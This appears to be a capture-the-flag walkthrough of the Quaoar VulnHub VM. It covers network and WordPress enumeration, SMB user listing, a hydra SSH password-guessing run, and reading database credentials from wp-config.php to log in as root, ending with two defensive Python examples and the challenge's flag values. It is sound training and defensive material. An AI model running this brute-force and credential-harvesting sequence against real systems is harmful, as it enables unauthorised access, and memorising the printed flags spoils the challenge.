For anyone interested in penetration testing and IT security, there is the need to test the theoretical skills you might have acquired. To give interested people a means to do so without violating the law, Capture-the-Flag (CTF) images exist. A CTF challenge is (usually) a virtual machine especially crafted with security vulnerabilities in it. The flags are text files that you must discover.
Previously, we solved the LazySysAdmin CTF challenge – today we’re using the Quaoar VM from vulnhub.
To get this VM, either to tag along while reading or if you’re interested and want to solve it by yourself, download it and import it into VirtualBox. A word of advice: Never let a downloaded VM directly into your network. Use a host-only network to reach the virtual machine from your host machine.
But now, let’s get started!
Remember to save anything that looks like it’s a username or could be a password in a file. This information might be useful later on.
The Quaoar-VM is set up to use the network adapter vboxnet0. So as a first step, we need to find it on the network.
```
$ netdiscover -i vboxnet0
192.168.99.101
```
As we’ll need that IP address a few times, I’ll export it to save myself some typing.
```
$ export IP=192.168.99.101
```
Now we can use $IP instead of typing it out all the time.
To get a general overview of the target machine, the ports are enumerated with
```
$ nmap -A $IP
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-06 21:51 CET
Nmap scan report for 192.168.99.101
Host is up (0.0020s latency).
Not shown: 991 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
[...]
53/tcp  open  domain      ISC BIND 9.8.1-P1
[...]
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open  pop3        Dovecot pop3d
[...]
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: LOGINDISABLEDA0001 more IMAP4rev1 listed post-login have SASL-IR ID ENABLE STARTTLS capabilities LITERAL+ Pre-login IDLE OK LOGIN-REFERRALS
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
[...]
445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
|_imap-capabilities: AUTH=PLAINA0001 IMAP4rev1 more post-login have SASL-IR ID ENABLE listed capabilities LITERAL+ Pre-login IDLE OK LOGIN-REFERRALS
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
[...]
995/tcp open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: PIPELINING TOP UIDL SASL(PLAIN) USER CAPA RESP-CODES
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
[...]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 59m57s, deviation: 0s, median: 59m57s
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: , NetBIOS MAC: (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.6.3)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-11-06T16:51:39-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.02 seconds
```
So we got to know quite a lot about the system. We have open ports for ssh, http, pop3, imap and samba, among others. We also know there is an apache webserver running on port 80 and, according to the robots.txt, there is a wordpress installation.
Let’s see what wpscan tells us about that wordpress instance:
```
$ wpscan --url $IP
_______________________________________________________________
        WordPress Security Scanner by the WPScan Team
                       Version 2.9.3
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.99.101/wordpress/
[+] Started: Mon Nov  6 21:55:33 2017

[!] The WordPress 'http://192.168.99.101/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.2.22 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.3.10-1ubuntu3
[+] XML-RPC Interface available under: http://192.168.99.101/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.99.101/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.99.101/wordpress/wp-includes/

[+] WordPress version 3.9.14 (Released on 2016-09-07) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers

[!] 20 vulnerabilities identified from the version number

[!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
    Reference: https://wpvulndb.com/vulnerabilities/8716
    [...]
[i] Fixed in: 3.9.15

[!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
    Reference: https://wpvulndb.com/vulnerabilities/8718
    [...]
[i] Fixed in: 3.9.15

[!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
    Reference: https://wpvulndb.com/vulnerabilities/8719
    [...]
[i] Fixed in: 3.9.15

[!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
    Reference: https://wpvulndb.com/vulnerabilities/8720
    [...]
[i] Fixed in: 3.9.15

[!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
    Reference: https://wpvulndb.com/vulnerabilities/8721
    [...]
[i] Fixed in: 3.9.15

[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8730
    [...]
[i] Fixed in: 3.9.16

[!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
    Reference: https://wpvulndb.com/vulnerabilities/8765
    [...]
[i] Fixed in: 3.9.17

[!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
    Reference: https://wpvulndb.com/vulnerabilities/8766
    [...]
[i] Fixed in: 3.9.17

[!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
    Reference: https://wpvulndb.com/vulnerabilities/8807
    [...]

[!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
    Reference: https://wpvulndb.com/vulnerabilities/8815
    [...]
[i] Fixed in: 3.9.19

[!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
    Reference: https://wpvulndb.com/vulnerabilities/8816
    Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
    [...]
[i] Fixed in: 3.9.19

[!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks
    Reference: https://wpvulndb.com/vulnerabilities/8817
    [...]
[i] Fixed in: 3.9.19

[!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
    Reference: https://wpvulndb.com/vulnerabilities/8818
    [...]
[i] Fixed in: 3.9.19

[!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS
    Reference: https://wpvulndb.com/vulnerabilities/8819
    [...]
[i] Fixed in: 3.9.19

[!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
    Reference: https://wpvulndb.com/vulnerabilities/8820
    [...]
[i] Fixed in: 3.9.19

[!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8905
    [...]
[i] Fixed in: 3.9.20

[!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
    Reference: https://wpvulndb.com/vulnerabilities/8906
    [...]
[i] Fixed in: 4.7.5

[!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
    Reference: https://wpvulndb.com/vulnerabilities/8910
    [...]
[i] Fixed in: 3.9.20

[!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
    Reference: https://wpvulndb.com/vulnerabilities/8911
    [...]
[i] Fixed in: 3.9.20

[!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
    Reference: https://wpvulndb.com/vulnerabilities/8941
    [...]
[i] Fixed in: 3.9.21

[+] WordPress theme in use: twentyfourteen - v1.1

[+] Name: twentyfourteen - v1.1
 |  Last updated: 2017-06-08T00:00:00.000Z
 |  Location: http://192.168.99.101/wordpress/wp-content/themes/twentyfourteen/
[!] The version is out of date, the latest version is 2.0
 |  Style URL: http://192.168.99.101/wordpress/wp-content/themes/twentyfourteen/style.css
 |  Referenced style.css: wp-content/themes/twentyfourteen/style.css
 |  Theme Name: Twenty Fourteen
 |  Theme URI: http://wordpress.org/themes/twentyfourteen
 |  Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des...
 |  Author: the WordPress team
 |  Author URI: http://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Finished: Mon Nov  6 21:55:37 2017
[+] Requests Done: 49
[+] Memory used: 32.5 MB
[+] Elapsed time: 00:00:03
```
Ok, that’s quite a lot of information to process. But before focusing too much on wordpress, we’ll stick to enumeration for now. Let’s take a look at the samba shares.
Enumerate the users first. Luckily, there’s an nmap script for that:
```
$ nmap --script smb-enum-users.nse -p 445 $IP
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-06 21:58 CET
Nmap scan report for 192.168.99.101
Host is up (0.00089s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-users:
|   QUAOAR\nobody (RID: 501)
|     Full name:   nobody
|     Description:
|     Flags:       Normal user account
|   QUAOAR\root (RID: 1001)
|     Full name:   root
|     Description:
|     Flags:       Normal user account
|   QUAOAR\viper (RID: 1000)
|     Full name:   viper
|     Description:
|     Flags:       Normal user account
|   QUAOAR\wpadmin (RID: 1002)
|     Full name:
|     Description:
|_    Flags:       Normal user account
```
Ok. So we see some usernames: root, viper and wpadmin. We’ll take note of them. Now we can check if there are any shares accessible:
```
$ nmap --script smb-enum-shares.nse -p 445 $IP
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-06 22:01 CET
Nmap scan report for 192.168.99.101
Host is up (0.00067s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\192.168.99.101\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (Quaoar server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\192.168.99.101\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds
```
This looks like we’re on to something here. A guest share with read/write access! We can now try to connect to that share!
```
$ smbclient //$IP/IPC$ -N
```
The prompt changes. Looks like we’re in!
Unfortunately, we can’t do anything on here:
```
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
```
Let’s leave that trace for now. We have gathered quite a lot of information already and can try to gain access with it.
With everything we discovered so far, we’re ready to take hydra for a spin and check if we already have valid credentials. Hydra is a login cracker that supports a lot of common protocols. The file info.txt is where I saved everything that looked like a user account or a possible password during enumeration.
```
$ hydra -L info.txt -P info.txt -u $IP ssh -t 4
[ssh] host: 192.168.99.101   login: wpadmin   password: wpadmin
```
Ok, we got our entry point!
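What hydra did here leaves a very recognisable trace on the target: a burst of `Failed password` entries from one source in sshd's auth log, followed by an `Accepted password` for one of the accounts that was just being guessed. The Python below is an added example, not part of the original post, showing how a defender can pull exactly that pattern out of `/var/log/auth.log`. The log excerpt is constructed (the attacking host's address 192.168.99.1 is assumed; the page does not give it), and the five-failures-per-minute threshold is an arbitrary starting point.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample auth.log excerpt (not taken from the page). The line format
# is what OpenSSH on Ubuntu 12.04 writes; 192.168.99.1 is an assumed address for
# the scanning machine, 192.168.99.50 a benign client that mistyped once.
SAMPLE_AUTH_LOG = """\
Nov  6 21:40:01 Quaoar sshd[2301]: Failed password for root from 192.168.99.1 port 50210 ssh2
Nov  6 21:40:01 Quaoar sshd[2302]: Failed password for root from 192.168.99.1 port 50211 ssh2
Nov  6 21:40:02 Quaoar sshd[2303]: Failed password for viper from 192.168.99.1 port 50212 ssh2
Nov  6 21:40:02 Quaoar sshd[2304]: Failed password for viper from 192.168.99.1 port 50213 ssh2
Nov  6 21:40:03 Quaoar sshd[2305]: Failed password for wpadmin from 192.168.99.1 port 50214 ssh2
Nov  6 21:40:03 Quaoar sshd[2306]: Failed password for wpadmin from 192.168.99.1 port 50215 ssh2
Nov  6 21:40:04 Quaoar sshd[2307]: Accepted password for wpadmin from 192.168.99.1 port 50216 ssh2
Nov  6 21:40:04 Quaoar sshd[2307]: pam_unix(sshd:session): session opened for user wpadmin by (uid=0)
Nov  6 21:52:10 Quaoar sshd[2350]: Failed password for viper from 192.168.99.50 port 41002 ssh2
"""

# Matches both "Failed password for <user>" and "Failed password for invalid user <user>".
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)


def parse_sshd_events(text, year=2017):
    """Return (timestamp, result, user, src) tuples for every password auth line.

    Syslog lines carry no year, so the caller supplies one (assumed 2017 here).
    """
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["src"]))
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Flag sources with >= threshold failures inside any `window`, and report
    which accounts they tried and which (if any) they then logged in as."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev[3]].append(ev)

    alerts = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e[0])
        failures = [e for e in evs if e[1] == "Failed"]
        # Sliding window over the sorted failure timestamps: peak = densest burst.
        peak, j = 0, 0
        for i in range(len(failures)):
            while failures[i][0] - failures[j][0] > window:
                j += 1
            peak = max(peak, i - j + 1)
        if peak < threshold:
            continue
        first_failure = failures[0][0]
        accepted = sorted({e[2] for e in evs
                           if e[1] == "Accepted" and e[0] >= first_failure})
        alerts.append({
            "src": src,
            "peak_failures": peak,
            "users_tried": sorted({e[2] for e in failures}),
            "accepted_after_failures": accepted,   # non-empty = the guess worked
        })
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(parse_sshd_events(SAMPLE_AUTH_LOG)):
        print(f"{a['src']}: {a['peak_failures']} failures/min, tried {a['users_tried']}, "
              f"then logged in as {a['accepted_after_failures'] or 'nobody'}")
```

The `accepted_after_failures` field is the part worth alerting on loudly: a burst of failures is noise on any internet-facing host, a burst followed by a success from the same source is an account compromise. On a real box the same logic can be pointed at `/var/log/auth.log` or at `journalctl -u ssh -o short` output, and the cheap preventive control is the one the page's lesson list already gives, namely not letting the username double as the password.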
```
$ ssh wpadmin@$IP
```
Let’s check if we have any interesting groups assigned.
```
$ id
uid=1001(wpadmin) gid=1001(wpadmin) groups=1001(wpadmin)
```
Nothing. But we have our first flag.
```
$ ls
flag.txt
$ cat flag.txt
2bafe61f03117ac66a73c3c514de796e
```
It’s safe to assume the user wpadmin has at least read rights for the wordpress installation. Let’s check it out and see if we get some more information!
```
$ cd /var/www/wordpress
$ cat wp-config.php | grep DB_
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'rootpassword!');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
```
Another password, great! Let’s see if this is the real root password for this box:
```
$ ssh root@$IP
root@192.168.99.101's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Mon Nov  6 18:40:50 EST 2017

  System load:  0.47              Processes:           95
  Usage of /:   29.9% of 7.21GB   Users logged in:     0
  Memory usage: 32%               IP address for eth0: 192.168.99.101
  Swap usage:   0%                IP address for virbr0: 192.168.122.1

  Graph this data and manage this system at https://landscape.canonical.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sun Jan 15 11:23:45 2017 from desktop-g0lhb7o.snolet.com
```
OK, let’s see.
```
root@Quaoar:~# ls
flag.txt  vmware-tools-distrib
```
Now we have the second flag.
```
root@Quaoar:~# cat flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb
```
We got it. Time to take a step back and have a look at what we learned during the penetration test of this VM:
- Enumeration is key. There’s a lot of information hidden in plain sight.
- If you’re running any sort of service, don’t reuse passwords.
- Disable everything you do not need on your systems.
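Two of the findings that led from the wpadmin shell to root sit in one file: wp-config.php was readable by a low-privilege account, and it connected WordPress to the database as the MySQL root user with a password that turned out to be reused for the system root account. The Python below is an added example, not code from the post or from WordPress, that audits a wp-config.php for the parts of that which can be checked from the file alone: its permission bits and its `DB_*` defines. The config fragment is a constructed copy of the defines printed above, written to a temporary file so the example runs anywhere; password reuse against other accounts cannot be verified from this file and has to be checked separately.

```python
import os
import re
import stat
import tempfile

# Constructed wp-config.php fragment mirroring the defines the walkthrough printed.
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'rootpassword!');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
"""

# define('KEY', 'value');  (single- or double-quoted, value may be empty)
DEFINE_RE = re.compile(r"""define\(\s*['"](\w+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")


def parse_defines(text):
    """Return the define('K', 'V') pairs of a PHP config file as a dict."""
    return dict(DEFINE_RE.findall(text))


def audit_wp_config(path):
    """Return a list of findings for the wp-config.php at `path` (empty = clean)."""
    findings = []

    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & stat.S_IROTH:
        findings.append(
            f"wp-config.php is world-readable (mode {mode:04o}); any local account "
            "can read the database credentials. Use 0640 owned by the web server user.")

    with open(path, encoding="utf-8") as fh:
        cfg = parse_defines(fh.read())

    if cfg.get("DB_USER") == "root":
        findings.append(
            "DB_USER is the MySQL root account; create a dedicated user granted "
            "only on the WordPress schema so a leaked wp-config.php exposes less.")
    if cfg.get("DB_PASSWORD", "") == "":
        findings.append("DB_PASSWORD is empty.")

    return findings


def run_demo(mode=0o644):
    """Write the constructed fragment with the given permission bits and audit it."""
    tmp = tempfile.NamedTemporaryFile("w", suffix=".php", delete=False, encoding="utf-8")
    try:
        tmp.write(SAMPLE_WP_CONFIG)
        tmp.close()
        os.chmod(tmp.name, mode)          # NamedTemporaryFile creates 0600 by default
        return audit_wp_config(tmp.name)
    finally:
        os.unlink(tmp.name)


if __name__ == "__main__":
    for finding in run_demo(0o644):       # the assumed state on the Quaoar box
        print("-", finding)
```

Run against a real installation with `audit_wp_config("/var/www/wordpress/wp-config.php")`. The permission check is deliberately strict about world-readability only; group-readable by the web server's group is the usual deployment and is left alone.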